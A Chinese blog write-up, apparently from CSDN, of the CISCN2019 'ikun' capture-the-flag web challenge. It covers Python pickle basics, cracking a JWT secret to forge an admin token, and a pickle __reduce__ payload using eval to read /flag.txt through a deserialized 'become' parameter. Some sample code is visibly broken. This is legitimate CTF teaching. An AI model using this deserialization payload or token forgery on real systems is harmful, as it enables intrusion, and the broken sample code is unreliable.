ciscn2019ikun

最新推荐文章于 2024-07-28 15:46:11 发布
最新推荐文章于 2024-07-28 15:46:11 发布
阅读量192 收藏
点赞数
分类专栏: wp 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XiAXiAb/article/details/119259012
版权

前置知识点:
一、python反序列化
python序列化反序列化模块之pickle~
pickle模块可存储数据类型
1.所有python支持的原生类型:布尔值,整数,浮点数,复数,字符串,字节,none
2.由任何原生类组成的列表,元组,字典和集合。
3.函数,类,类的实例。

pickle模块中常用的方法有
1.pickle.dump(obj,file,protocol=none)
obj为 将要封装对象;file为obj要写入的文件对象,file必须以二进制可写模式打开"wb";可选参数protocol表示告知pickle使用的协议。

2.pickle.load(file,*,fix_import=Ture,encoding=“ASCII”,errors=“strict”)
必填参数file要以二进制可读模式打开,即”rb“,其他都为可选参数

3.pickle.dumps(obj):以字节对象形式返回封装的对象,不需要写入文件中。

4.pickle.loads(bytes_object):从字节对象中读取被封装的对象,并返回pickle模块可能出现的三种异常。
PickleError:封装和拆封时出现的异常类,继承自Exception
PicklingError:遇到不可封装的对象出现的异常,继承自PickleError
UnPicklingError:拆封对象过程中出现的异常,继承自PickleError

import pickle
aString = 'sadasda'
aDict = {'p':'python','r':'rust','s':'swift'}
aList = {'one','two','three'}
f = open{'test.pkl','wb'}
pickle.dump(aString,f,True)
pickle.dump(aDict,f,True)
pickle.dump(aList,f,True)
f.colse()
f1 = open('test.pkl','rb')
a = pickle.load(f1)
a
'sadasda'
b = pickle.load(f1)
b
{'p':'python','r':'rust','s':'swift'}
c = pickle.load(f1)
c
{'one','two','three'}
//输出顺序类似于队列先进先出
//dump多少load多少,没有后报错

题解
打开题目看到hint
在这里插入图片描述我们需要找到lv6
点击页面查看发现page为参数可通过page改变页数。
尝试寻找lv6,无果。
写脚本寻找lv6

import requests
url = "http://148eb42d-29c2-46fd-894b-ee6014361c13.node4.buuoj.cn"

for i in range(1,1000):
	r = requests.get(url+"shop?page="+i)
	r = r.text
	if "lv6.png" in r.read().decode('utf-8'):
		print(i)
		break

输出结果lv6在181页

打开页面想要购买发现需要先注册

遂注册账号,发现1000块买不起lv6,过于贫穷。
在这里插入图片描述在这里插入图片描述抓包尝试修改价格和折扣发现都无法成功购买
购买失败后发现页面出现了302跳转,我们访问看看
在这里插入图片描述哦豁,界面只允许admin访问
尝试一下啊能不能注册个admin或者是不是弱口令
不是不是都不是
再看看之前抓的包,诶,好家伙这不是有个jwt
用jwt-cracker爆破一哈喃,据说还有这个c-jwt-cracker

跑出来密钥为1Kun
再去jwt.io加密一下
在这里插入图片描述加密后复制到bp中发送,hackbar没整明白
刷新后现实登陆成功页面,ummmm也一键成不了大会员,害。

那先看看源码喃。
在这里插入图片描述好家伙,你删了跑了我搁这找半天,逗我玩呢呜呜呜。
那我们就下源码审计一下吧,虽然并不大会
反正我是借鉴的 ,Admin.py里有东西,先看看啊。
在这里插入图片描述这个类里有两个函数噶,get(),post()。这起名很难不让我们知道是在传参对吧~
get里没啥特别的,要求以admin登录就行
post将become的值进行传参,哦豁,他对become进行了反序列化操作哈哈哈哈。

再继续研究一下如何对become进行利用

import pickle
import urllib
 
class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))
# __reduce__:当定义扩展类型时(也就是使用Python的C语言API实现的类型),如果你想pickle它们,你必须告诉Python如何pickle它们。
# __reduce__ 被定义之后,当对象被Pickle时就会被调用。
# 它要么返回一个代表全局名称的字符串,Pyhton会查找它并pickle,要么返回一个元组。
# 这个元组包含2到5个元素,其中包括:
#       一个可调用的对象,用于重建对象时调用;【我们这里的eval】
#       一个参数元素,供那个可调用对象使用; 【我们这里的open('/flag.txt','r').read()】
#       被传递给 __setstate__ 的状态(可选);
#       一个产生被pickle的列表元素的迭代器(可选);
#       一个产生被pickle的字典元素的迭代器(可选)
a = pickle.dumps(payload())
# pickle.dumps(obj):以字节对象形式返回封装的对象,不需要写入文件中
a = urllib.quote(a)
print a

我们将定义好的__reduce__传入become
become接收参数后进行pickle操作
reduce 被定义之后,当对象被Pickle时就会被调用。
故成功调用__reduce__!

XiAXiAb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8494
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
CISCN-WEB-ikun
迷风小白
09-17 3481
知识点 薅羊毛与逻辑漏洞 cookie伪造 python反序列化 IKUN 1.拿到题目,先注册一个账号登录 2.登录进去发现存在账户余额,且根据题目提示需要购买lv6 3.这里的商品目录很多,一页一页找太麻烦了,所以可以写个脚本搜一下 import requests url = "http://acb60e5d-e45c-417d-92b0-0175588a97ab.node1.bu...
[CISCN2019 华北赛区 Day1 Web2]ikun
rev1ve的博客
09-05 232
[CISCN2019 华北赛区 Day1 Web2]ikun pickle反序列化 ,JWT加解密与密钥, js前端代码
CISCN2019_华北赛区_Day1_Web2]ikun_1通关手册
No_1_is_me的博客
11-14 1928
CISCN2019_华北赛区_Day1_Web2]ikun_1通关手册
记 [CISCN2019 华北赛区 Day1 Web2]ikun 关于python的反序列化漏洞的思考
fly夏天的博客
03-30 1706
复现平台:buuctf 这题很是复杂,我也是研究了整整一天,发出来供诸位参考参考。 打开题目,脑海里不自觉的就想到了鸡你太美,为了守护世界上最好kunkun,必须搞出这题。 打开页面,是一个类似的商城页面,提示 下面是各种等级的B站账号,显然这题是想要我们购买一个lv6的账号,随便翻卡了几页还是没有看见lv6。 我们来抓包看看 可以通过传page的值来跳到指定页...
【2019 CISCN华北赛区Day1 Web2】ikun
weixin_61951055的博客
11-08 809
2019 CISCN华北赛区Day1 Web2 WriteUp (全国大学生信息安全竞赛)
CISCN 2019-ikun
怪味巧克力的博客
06-15 734
0x01 进去网址,页面如下: 刚开始有个登陆和注册的按钮,上图是我已经注册后登陆成功后的页面,我们发现在图的左下角给了一个关键的提示,购买LV6,通过寻找我们发现页面数很多,大概500页,一个一个找不上办法,所以我们用脚本去寻找LV6所在页面,脚本如下: import requests r = requests.session() url = "http://220.249.52.133:52610/shop?page=" for i in range(0,1000): re = r.get(
ikun.exe
10-19
ikun.exe
测试一下你是不是IKUN
10-05
标题“测试一下你是不是IKUN”暗示这可能是一个与编程挑战或测试相关的项目,而描述中的“代码秀:你干嘛!!!哎呦!!!”则带有轻松、互动的氛围,可能是通过编写C++代码来实现某种特定功能或者解决一个问题。...
ikun-kunkun-吃掉坤坤爱坤-html-源码.rar
03-30
【标题】"ikun-kunkun-吃掉坤坤爱坤-html-源码.rar" 提供的是一款与粉丝文化相关的HTML源码项目,其中“ikun”和“坤坤”通常指的是某位明星的粉丝群体和该明星的昵称。这个项目的目的是为粉丝们创建一个互动平台...
ikun电脑桌面宠物.exe
09-22
ikun电脑桌面宠物.exe
love_Ikun.exe
11-10
love_Ikun.exe
vue课程75 axios是只专注于网络请求的库
geyaoisnice的博客
07-01 229
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>D...
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 920
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 1023
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
全面解析 SnowNLP:中文文本处理、情感分析
有勇气的牛排博客
07-24 614
SnowNLP 是一个专门用于处理中文文本的 Python库。分词情感分析关键词提取文本分类拼音转换繁体转简体词相似度计算等测试环境:Python3.10.9尚未测出该功能text = "有勇气的牛排写的文章通俗易懂,爱了爱了"文本分类使用的是 SnowNLP 的情感分析模型。
Chapter 18 Python异常
最新发布
2302_80253507的博客
07-28 1059
在Python中,异常是一种特定的对象,能够在程序运行过程中被抛出和处理。有效地管理异常不仅可以增强程序的稳定性,还可以提高用户体验,使程序能够优雅地处理错误情况。本章详细讲解了异常的基本概念以及如何捕获和处理异常。
ikun python
10-08
ikun python是指使用Python编写的一些项目或功能,其中包括ikun飞机大战和ikun音乐播放器。ikun飞机大战是一个使用Python和tkinter库开发的游戏,而ikun音乐播放器则是使用Python的tkinter和pygame库开发的一个音乐...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值